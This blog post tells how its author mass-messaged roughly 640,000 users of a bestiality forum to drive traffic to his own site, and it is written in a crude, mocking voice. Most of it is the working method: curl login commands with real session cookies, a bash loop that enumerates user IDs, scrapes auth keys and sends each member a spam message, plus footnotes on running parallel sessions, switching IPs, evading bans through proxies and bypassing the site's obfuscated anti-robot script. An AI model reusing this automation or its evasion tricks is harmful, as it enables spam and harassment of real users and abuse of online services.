How the beastforum.com private messaging function became a paid-user-only item

Monday, 06 November, Year 9 d.Tr. | Author: Mircea Popescu

You probably never heard of the largest bestiality forum on the internets, home to nearly 2mn registered users who regularily spew stuff like "since I first knotted with him six months ago my body has been changing I think I am adapting and we are becoming lovers nature wants us together" and so forth.

Nevertheless, beastforum.com exists, and has for many years existed. During those years and up until yesterday the collected population of... well, I suppose furries is the technical term, neh ? have produced a total of 11`324`994 public posts, and a whopping 12`511`460i private messages. That's right, they PM more than they post. Who knew, who could have guessed!

This tendency aggravated in the past 24 hours : while they went from 11`324`994 published posts to 11`362`293 (+299) they also went from 12`511`460 private messages to a whopping 13`154`912 (+643`452). What could have possibly issued over half a million PMs in a day, increasing the total count by something like 5% ? Well...

curl -kii -viii --cookie-jariv - -A "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:20.0) Gecko/20100101 Firefox/20.0" --interface "eth0:30"v --cookie "_cfduid=d0c2892e05534f0779df2f54dd73bedf71509847835;surfer=Ch4ADVn+cxsVYnzyIZmpAg==;Anti-Robot=51af22c8a0c2eff90a4d8781cee82723b189371evi" --data "referer=&UserName=whatever&PassWord=whatever&CookieDate=1" "https://www.beastforum.com/index.php?act=Login&CODE=01" > hurr.txt

A cat hurr.txt will yield some items of interest : __cfduid (not really used for anything), session_id (basically the actual login token), member_id and pass_hash which are not strictly speaking required but help with long term session life.

You put those into

for i in {1934360vii..1..12viii}; do usrix=$(curl -m 20 -k -A "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:20.0) Gecko/20100101 Firefox/20.0" --interface "eth0:29" --cookie "__cfduid=01a62af28652383bd3e53d09180e75b7161f8842ead; session_id=bae22d4ff56ab9eb16ac77f470f74b76;member_id=1934360;Anti-Robot=696bd05573b4b04517028db39723b962dd3ac1af;pass_hash=f1e414681cfa28ee6aca32336ba97e91" "https://www.beastforum.com/index.php?act=Msg&CODE=4&MID=$i"); unamex=$(echo "$usr" | grep "entered_name" | awk -F "'" '{print $8;}'); akeyxi=$(echo "$usr" | grep "auth_key" | awk -F "'" '{print $6;}');res=$(curl -m 20 -k -A "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:20.0) Gecko/20100101 Firefox/20.0" --interface "eth0:29" --cookie "__cfduid=01a62af28652383bd3e53d09180e75b7161f8842ead; session_id=bae22d4ff56ab9eb16ac77f470f74b76;member_id=1934360;Anti-Robot=696bd05573b4b04517028db39723b962dd3ac1af;pass_hash=f1e414681cfa28ee6aca32336ba97e91" --data "act=Msg&CODE=04&MODE=01&OID=&auth_key=$akey&entered_name=$uname&msg_title=Hey+is+this+story+about+you%3F&bbmode=normal&ffont=0&fsize=0&fcolor=0&tagcount=0&helpbox=Hint%3A+Use+Guided+Mode+for+helpful+prompts&Post=trilema.comxii%2F2014%2Fhow-i-was-wrong-cuckolding-or-a-story-about-sigmas%2F%23selection-219.0-219.17%0D%0ASame+name%2C+right.&submit=Send+Message" "https://www.beastforum.com/index.php?" > usr.txt); echo $uname, $i; sleep 1xiii; done

While the script is working it will print out a count and a username ; at any point one can $ cat usr.txt | grep "has been" to see who's last received a message.

Every six hours or so the sender will get banned, by account, which is terrible terrible news because believe it or not beastforum.com permits a single account be created per IP (which makes one think that conceivably there actually are a coupla million English speakers out there into watching horses fuck people etc) except it doesn't at all matter because the lousiest of webproxies is perfectly capable of creating a new account for you.

And so here we are : after banning four different "users" the technologically aptxiv folk running beastforum.com gave in and took the PM function offline altogether (well, technically put it behind the paywallxv, which I suspect might be the same thing). Sorry, furfies looking for group, I guess I fucked this one up for youxvi.

PS. Today as in 2014,

Go make up your own traffic figures, it's a worthless pursuit that will teach you a lot about both computers and the human nature ;

———
  1. You wonder how I know the precise count ? Ah, that's easy, they leak them everwhere, such as via &MSID=number. []
  2. Ignores ssl "certificates" bullshit []
  3. Verbose. []
  4. Explicitly saves cookies. []
  5. Allows you to switch IPs. Nifty, huh. []
  6. Their "anti-robot" protection consists of some inept cookie setting via javascript. Like so :

    <html>
    <body onload="challenge();">
    <script>
    eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String) ){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('d a(){1.e=\'5=6; 7-8=9; 4=/\';1.b.c=2.3.f+2.3.g;1.h[0].i()}',19,19,'|document|window|location|path|Anti-Robot|696bd05573b4b04517028db39723b962dd3ac1af|max|age|86400|challenge|response|action|function|cookie|pathname|search|forms|submit'.split('|'),0,{}) )
    </script>

    Evidently no robots can ever read this, you know ?
    []

  7. Don't wonder how I know the user count, they leak it all sorts of places such as for instance showuser-n.html. []
  8. If we're going to use 12 simultaneous sessions of this script (via, for instance, screen ; Ctrl-A c ; you're welcome) it is useful to count by 12s and decrement the start by 1 for each session. []
  9. They're kind enough to prepopulate our message sending form with the correct name of the user on the basis of referencing him by his index. We use this property to extract some valuable data for later on (mostly for our own reporting --the akey bit is there mostly to appear elegant, in practice the keys are reused over multiple postings). []
  10. We extract the recipient's name to keep track of what's going on. []
  11. Similarily extract the mostly worthless "authentication key". []
  12. We do not want the url clickable ([URL] wrapping would do the trick) because that'd also get it filtered out.

    As it is, you could not believe how many people are befuddled by the incomprehensible item that looks like a link but is not clickable. About an eight of the total or so! Help, wut do ?

    Other things you'd probably not believe is the immense count of people willing to respond! I read thousands of malformed epistles before finally giving up, including the sad confessions of large numbers of people who'd never before received a PM but would like to make friends and even one that informed me that there's "a complaint going" about some other post on Trilema! []

  13. Not really used for anything, here as a placeholder rather. []
  14. Don't they remind you of the Bitlove LLC tech mavens, btw ? []
  15. Amusingly, you can sign up using Bitcoin, it's 19.95 EUR for 30 days (if you use a credit card it's only 19.95 USD for some reason). This allows us to do some math together : the economic value of the ~5,395 users redirected so far to Trilema by this procedure would be worth at ~2.5 USD/1k (talk to the traffic brokers) a whooping 13.4875 USD, which would almost make paying for an account a feasible proposition! I wonder if they did the same math when they came up with the solution. []
  16. But had you NOT complained about it -- who knows, maybe you'd still have PMs available ? []
Category: Meta psihoza
Comments feed : RSS 2.0. Leave your own comment below, or send a trackback.

4 Responses

  1. https://archive.is/nnNgL for posterior.

  2. spartacus`s avatar
    2
    spartacus 
    Monday, 6 November 2017

    bullish though

  3. There's also https://archive.is/cP7hr

  4. Mircea Popescu`s avatar
    4
    Mircea Popescu 
    Monday, 6 November 2017

    Let the peps flow fleery!

Add your cents! »
    If this is your first comment, it will wait to be approved. This usually takes a few hours. Subsequent comments are not delayed.